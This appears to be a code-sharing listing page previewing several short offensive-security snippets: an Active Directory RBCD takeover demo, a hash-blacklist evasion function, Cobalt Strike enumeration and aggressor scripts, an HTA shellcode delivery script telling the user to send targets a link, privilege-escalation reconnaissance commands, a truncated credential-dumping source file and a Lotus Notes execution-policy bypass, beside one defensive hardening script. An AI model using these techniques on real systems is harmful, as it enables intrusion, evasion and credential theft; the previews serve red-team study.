View rbcd_demo.ps1
# import the necessary toolsets | |
Import-Module .\powermad.ps1 | |
Import-Module .\powerview.ps1 | |
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
whoami | |
# the target computer object we're taking over | |
$TargetComputer = "primary.testlab.local" |
View windows_hardening.cmd
:: | |
::####################################################################### | |
:: | |
:: Change file associations to protect against common ransomware attacks | |
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell | |
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :) | |
:: --------------------- | |
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" | |
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" | |
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" |
View Copy-AuthenticodeSignedFile.ps1
function Copy-AuthenticodeSignedFile { | |
<# | |
.SYNOPSIS | |
Creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature. | |
.DESCRIPTION | |
Copy-AuthenticodeSignedFile creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature. This is used to bypass application whitelisting hash-based blacklist rules. |
View cobaltstrike_sa.txt
Windows version: | |
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | |
Users who have authed to the system: | |
ls C:\Users\ | |
System env variables: | |
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment | |
Saved outbound RDP connections: |
View TestMSHTAShellcodeDelivery.ps1
<# | |
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta | |
To change your server, simply find and replace 192.168.1.1 with your server in the code. | |
#> | |
<# | |
Moving Credtis for CACTUSTORCH HERE | |
I was in escape sequcence hell ;-) | |
' ( ) ( ) |
View blog.txt
From the inside out, a minimalist backdoor. | |
I'm a pretty big fan of simple, and elegant. In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a FireWall, NAT and VPN. | |
We will use in this example 3 tools. | |
1. Node | |
2. PowerShell | |
3. LocalTunnel | |
While I have a full compact, custom version, I will not release this. |
View initial.cna
# | |
# Demonstrate how to queue tasks to execute with each checkin... | |
# | |
# | |
# yield tells a function to pause and return a value. The next time the same instance of the | |
# function is called, it will resume after where it last yielded. | |
# | |
sub stuffToDo { | |
# Tasks for first checkin |
View windows_privesc
// What system are we connected to? | |
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" | |
// Get the hostname and username (if available) | |
hostname | |
echo %username% | |
// Get users | |
net users | |
net user [username] |
View katz.cs
This file has been truncated, but you can view the full file.
using System; | |
using System.IO; | |
using System.Text; | |
using System.IO.Compression; | |
using System.EnterpriseServices; | |
using System.Collections.Generic; | |
using System.Runtime.InteropServices; | |
using System.Security.Cryptography; | |
View LotusNotes Running PowerShell Code
"C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } | |
NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } | |
Hashes of each binary (prepare for onslaught of md5 naysayers): | |
Notes.exe — 8f633ef1e1147637c25dd917909cd361 | |
NLNOTES.EXE — 3586b9069a1d4e1c63d9c9cf95cf4126 |
NewerOlder